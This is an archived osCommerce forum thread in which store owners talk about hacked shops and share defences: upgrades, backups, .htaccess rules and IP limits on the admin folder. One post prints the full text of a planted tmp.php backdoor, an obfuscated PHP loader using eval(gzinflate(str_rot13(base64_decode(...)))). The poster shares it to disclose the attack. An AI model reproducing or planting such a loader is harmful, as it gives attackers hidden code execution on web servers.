Jump to content

Archived

This topic is now archived and is closed to further replies.

Snarg

Was this a hack attempt?

Recommended Posts

i think the hacker came through the /admin/login.php exploit.

I had installed OsCommerce 2.2 RC2, when this happend.

 

I Updated now to 2.3.1, changed admin and DB password, now it looks good. I will let you know, if the hacker come again ;)

Share this post


Link to post
Share on other sites

Hi everybody,

 

This is indeed caused by OsCommerce.

 

NO... it is not caused by osCommerce, is is caused because you have (or had) a lack of security on your version of osCommerce - and that applies to everyone that comes on to this forum crying that their store has been hacked.

 

That statement may sound harsh but it is true, how many of you had back-ups of your store to put into place for if your store got hacked or your host dies? For those that have up graded to 2.3.1 how many have put in extra security and have a full clean back-up?

 

Think about it... you have a store - it could be a plaything - it could be bringing in your lifestyle - it deserves to be protected the best you can do it... wouldn't you say?


Currently...:

 

Working with osCommerce 2.3.1

Now working with Phoenix

Add-Ons so far Installed:

Not all of these installed yet on Phoenix - some are and the rest will be

 

Add date and order number to invoice and packing slip,

Products Cycle Slideshow,

Detailed Monthly Sales,

Holiday Settings,

Tracking Module for 2.3

Share this post


Link to post
Share on other sites

NO... it is not caused by osCommerce, is is caused because you have (or had) a lack of security on your version of osCommerce - and that applies to everyone that comes on to this forum crying that their store has been hacked.

 

That statement may sound harsh but it is true, how many of you had back-ups of your store to put into place for if your store got hacked or your host dies? For those that have up graded to 2.3.1 how many have put in extra security and have a full clean back-up?

 

Think about it... you have a store - it could be a plaything - it could be bringing in your lifestyle - it deserves to be protected the best you can do it... wouldn't you say?

 

+1

 

You put it so much more eloquently than I could have.


This is a signature that appears on all my posts.  
IF YOU MAKE A POST REQUESTING HELP...please state the exact version
of osCommerce that you are using. THANKS

 
Get the latest Responsive osCommerce CE (community edition) here

Share this post


Link to post
Share on other sites

osCommerce is vulnerable. I have couple of osCommerce sites been hacked recently. The latest one put .htaccess file into almost all folders, took me much time to clear. Could there be any body give hints where and how they break into the server.

Share this post


Link to post
Share on other sites

CJ,

 

Read the security forums.

 

 

 

Chris


:|: Was this post helpful ? Click the LIKE THIS button :|:

 

See my Profile to learn more about add ons, templates, support plans and custom coding (click here)

Share this post


Link to post
Share on other sites

Hey guys,

 

SAME THING TO ME. I have two stores (one with 2.3.1 and another with 2.2 RC2a) and in 25-01 at 1.25.00 AM appeared several .htaccess files...

 

One of my stores got hacked, I cleaned it up completely, deleted .php files and everything... took me two full days to do it...

 

Now, I have a problem trying to create xml Sitemap... anyone has the same issue?? I have 500 Internal server error with the xml bot.

 

Thanks for your help!

Share this post


Link to post
Share on other sites

Your .htaccess in your images folder should contain the following:

 


# $Id$
#
# This is used to restrict access to this folder to anything other
# than images

# Prevents any script files from being accessed from the images folder
<FilesMatch "\.(php([0-9]|s)?|s?p?html|cgi|pl|exe)$">
  Order Deny,Allow
  Deny from all
</FilesMatch>

 

And nothing else, so if yours contains anything other than the above code delete it and replace it with the above

Share this post


Link to post
Share on other sites

I have uploaded this script to my .htaccess file in my images directory, but I still have a hacker posting to my images directory.

I remove the files almost daily. the are tmp.php mail.php read.php news.php class.php and other files

I have removed all admins and renamed admin. I have checked all other directories, no other *.php files.

I am at a loss of how they are posting to the images directory with I have the script posted in my .htaccess file. Is there any other thing I can do?

Share this post


Link to post
Share on other sites

You could put this .htaccess file in the images folder.

 

It doesn't stop them from uploading crap, but the scripts won't run after they're uploaded so it doesn't matter a whole lot.

 

Check the permissions on the images folder.

 

They should NOT be higher than 755.

 

You can find other tips at the link below:

 

How to Secure Your Site


If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 

Like this post? "Like" it again over there >

Share this post


Link to post
Share on other sites

Well, I'm sure we'll all be delighted to learn that they're still out there. This happened to me on a BRAND NEW 2.2 installation--that is, WHILE I WAS SITTING HERE INSTALLING IT. Details I can provide are:

 

1) It happened sometime around noon, Eastern time today.

2) The tip-off was a "tmp.php" file in the main images directory, which was flagged 755. I will paste in the contents of that file.

3) It happened AFTER I did the basic OSC install but JUST BEFORE the .htaccess/.htpasswd files were uploaded.

4) I found an extra admin user. I found .htaccess files scattered around in several unexpected places.

5) A copy of my configure.php file was re-located from includes to the web root. I had already reset the permissions on this file.

 

NONE of my existing osCommerce installs were impacted. All have had the various 2.2 security recommendations implemented. I can only conclude that they got this one because it was in progress.

 

I have noted NO ISSUES with WordPress over the past two weeks, if anybody happens to have it. Will be checking more closely shortly.

 

Hosting is through Rackspace Cloud, and they were unaware of any problems. I fixed that for them--they are now. :-)

 

I think that's about it. Since this was a fresh install, and since I have all the files locally, it gave me the greatest pleasure just to blow the whole d#mned thing away.

 

Lessons Learned: (1) Create the .htaccess and .htpasswd files BEFORE doing the install and upload them immediately thereafter when the install directory is deleted. (2) Continue to follow, rigorously, the security advice pinned to this forum. (3) When doing a new install, don't even get up to "p" until the site is locked down.

 

I'm not going to talk about how much I want to kill this person. In six years, I've only had one other infiltration, and that was an XSS problem several years ago.

 

Regards,

Anne

 

TEXT OF THE TMP.PHP FILE, FOUND IN THE IMAGES DIRECTORY

<?php
set_time_limit(0); 
error_reporting(0); 
$rhs="xZXBYYJAEEDvJv7D1otrQO41Mb00PfbSu8FoEBpgN+xFIKb/XrXYUu0BlmT2yBBrA2xsm1FeR+ZcJyLfQJ0orbw51MDni8VuOlYi7+Vn5c2rPXUWeC2fg2ALdtooTIhFL7nIggxpVhgoROilzPfMf3SBzuTfYCWhVa9Ux7ezAwMeCzb7FHe2+p5BIEhga7w8PtOTJxBrdiX9najyR4Q75oc90QjcJq+Zr1FMY+gJXSNgI9A8vvtm/RawAr69fvR7+238xw1n9Sss/nDejtGdUuNNuovHt2UYDWJcvn1pkM/DwQOctv5LaU+yw+8o25b66byI2eWu3io+7rK5YbiZRJa8WKXrbJdXX/UrOmjbu2PCwmqxNJ0f4TNPaVNrjVlqSv7xniMv4eAUsPSe8ix1lIasZg6cr1bPgJZV2P+W6KD9FzJs91swcvNbJETv7bzFVYydv4hxh40f5TPiAi7aPtxiwq7LQykdF6Up+3JP2WnDpKu7btL3vcOmLrxOEzbeQHYqYu0wT3esXVNyu3j9S7dESmPQeyvXH0f82xs/";
eval(gzinflate(str_rot13(base64_decode($rhs))));
?>

Share this post


Link to post
Share on other sites

Hi Guys,

 

Interesting thread - whilst I'm not specifically an expert with os commerce, I am an expert in web application pentests. One recurring theme that can be seen throughout OSCommerce-related security posts and topics, is that the majority of attacks stem from the admin folder being publicly accessible. I'd suggest that, for those users with a static IP, you restrict access to the admin directory from only known administrative IP's - rather than rely on basic auth which is fundamentally flawed.

 

You should be able to place the following code in a .htaccess file and upload to your admin folder to achieve this:

 

<LIMIT GET>
order allow,deny
allow from xx.xx.xx.xx
deny from all
</LIMIT>

 

Also, consider having regular security tests - even if it's not by ourselves. They're about as cheap as a night out and can save you from the chaos of being hacked.

Share this post


Link to post
Share on other sites

 

<LIMIT GET>
order allow,deny
allow from xx.xx.xx.xx
deny from all
</LIMIT>

 

 

This would limit store owners to accessing their sites from limited locations and those who use mobile devices that receive an IP on demand would not be able to access their site at all.

 

 

 

Chris


:|: Was this post helpful ? Click the LIKE THIS button :|:

 

See my Profile to learn more about add ons, templates, support plans and custom coding (click here)

Share this post


Link to post
Share on other sites

×